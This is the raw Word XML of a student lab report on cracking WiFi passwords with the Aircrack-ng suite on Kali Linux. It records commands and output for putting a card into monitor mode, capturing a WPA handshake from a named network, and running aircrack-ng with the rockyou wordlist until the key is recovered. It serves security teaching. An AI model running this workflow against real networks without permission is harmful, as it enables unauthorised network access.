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b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ganesh Babu V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Roll No: 251901047</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E06E9" w14:textId="525587D0" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:ind w:left="7996"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E06EA" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06EB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1B1E06EC" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06ED" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06EE" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06EF" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F0" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F1" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F2" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F3" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F4" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="152" w:line="280" w:lineRule="auto"/>
        <w:ind w:right="1945"/>
      </w:pPr>
      <w:r>
        <w:t>BackTrack</w:t>
      </w:r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1B1E06F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1B1E06F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Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Source</w:t>
      </w:r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1B1E06F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r>
        <w:t>Open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B1E06F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1B1E06F9" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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B1E06FA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B1E06FB" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="420" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00C868EC"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1B1E06FC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B1E06FD" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E06F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1B1E06FF" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E070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1B1E0701" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0702" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E070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1B1E0704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B1E070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 xml:space="preserve">systems like the Raspberry Pi and BeagleBone Black.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0706" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="199"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0707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08" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0709" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E070A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1B1E070B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E070C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E070D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E070E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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well</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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1B1E070F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B1E071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Aircrack-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E071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1B1E071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1B1E071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1B1E0714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1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B1E071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1B1E071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1B1E071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Airodump-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0719" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E071A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E071B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Aircrack-ng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1E071C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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 xml:space="preserve">WiFi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1B1E071D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:t>WiFi</w:t>
      </w:r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B1E071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1B1E071F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E072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r>
        <w:t>deauthentication,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1B1E072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r>
        <w:t>WiFi</w:t>
      </w:r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B1E072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1B1E0723" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0724" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>OpenBSD,NetBSD,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0725" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:t>eComStation</w:t>
      </w:r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1B1E0726" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0727" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0728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1B1E0729" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E072A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E072B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2C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E072D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E072E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1B1E072F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30" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0731" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0732" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0733" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0734" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0735" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0736" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0737" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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aircrack-ng tool in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0738" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="152" w:line="420" w:lineRule="auto"/>
        <w:ind w:right="7995"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Kalilinux</w:t>
      </w:r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1B1E0739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iwconfig</w:t>
      </w:r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1B1E073A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iwlist</w:t>
      </w:r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B1E073B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airmon-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E073C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airmon-ng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process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E073D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r>
        <w:t>Again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 xml:space="preserve">AP channel withairmon-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E073E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r>
        <w:t>airodump-ng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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Vectors(IVs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E073F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atleast</w:t>
      </w:r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1B1E0740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1B1E0741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r>
        <w:t>aircrack-ng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1B1E0742" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0743" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0744" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>iwconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0745" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0746" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ESSID:off/any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0747" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:line="420" w:lineRule="auto"/>
        <w:ind w:right="3817"/>
      </w:pPr>
      <w:r>
        <w:t>Mode:Managed</w:t>
      </w:r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 xml:space="preserve">Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0748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49" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76" w:line="420" w:lineRule="auto"/>
        <w:ind w:right="7655"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Encryption key:off Power</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Management:off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E074A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="420" w:lineRule="auto"/>
        <w:ind w:right="6579"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lo no wireless extensions. root@kali:~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>iwlist</w:t>
      </w:r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 xml:space="preserve">scanning wlan0 Scan completed :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E074B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>14:F6:5A:F4:57:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E074C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Channel:6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E074D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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Ǫuality=70/70 Signal level=-27 dBm Encryption key:on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ESSID:"BENEDICT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E074E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E074F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0750" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0751" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0752" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0753" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="420" w:lineRule="auto"/>
        <w:ind w:right="6750"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode:Master Extra:tsf=00000000425b0a37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1B1E0754" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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1B1E0755" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="208" w:line="420" w:lineRule="auto"/>
        <w:ind w:right="6579"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : PSK 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1B1E0756" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0757" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:t>airodump-ng,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aireplay-ng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airtun-ng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1B1E0758" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>NetworkManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0759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5A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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B1E075B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E075C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E075D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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"airmon-ng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kill" root@kali:~# airmon-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E075E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E075F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0760" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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B1E0761" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201" w:line="417" w:lineRule="auto"/>
        <w:ind w:right="6579"/>
      </w:pPr>
      <w:r>
        <w:t>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1B1E0762" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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vif</w:t>
      </w:r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[phy0]wlan0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[phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0763" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0764" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="420" w:lineRule="auto"/>
        <w:ind w:right="2213"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>airodump-ng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r>
        <w:t>atheros</w:t>
      </w:r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--bssid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>14:F6:5A:F4:57:22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wlan0mon CH 6 ][ Elapsed: 5 mins ][ 2016-10-05 01:35 ][ WPA handshake: 14:F6:5A:F4:57: BSSID PWR RXǪ Beacons #Data, #/s CH MB ENC CIPHER AUTHE 14:F6:5A:F4:57:22 -31 100 3104 10036 0 6 54e. WPA CCMP PSK B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0765" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="417" w:lineRule="auto"/>
        <w:ind w:right="3817"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BSSID STATION PWR Rate Lost Frames Probe 14:F6:5A:F4:57:22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>70:05:14:A3:7E:3E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1B1E0766" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="199"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0767" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="422" w:lineRule="auto"/>
        <w:ind w:right="7995"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~#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1B1E0768" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7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1B1E0769" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="208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1B1E076A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="198"/>
      </w:pPr>
      <w:r>
        <w:t>-rw-r--r-- 1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1B1E076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6C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-rw-r--r--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r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>01.kismet.netxml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E076D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E076E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E076F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="420" w:lineRule="auto"/>
        <w:ind w:right="1854"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aircrack-ng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/usr/share/wordlists/rockyou.txt [00:00:52] 84564 keys tested (1648.11 k/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0770" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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rec12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0771" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0772" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="141"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0773" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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B1E0774" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0775" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="191" w:line="420" w:lineRule="auto"/>
        <w:ind w:right="3817"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transient Key :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1B1E0776" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0777" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0778" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C22BC7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1B1E0779" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E077F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0780" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0781" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0782" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0783" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0784" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0785" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0786" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0787" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0788" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
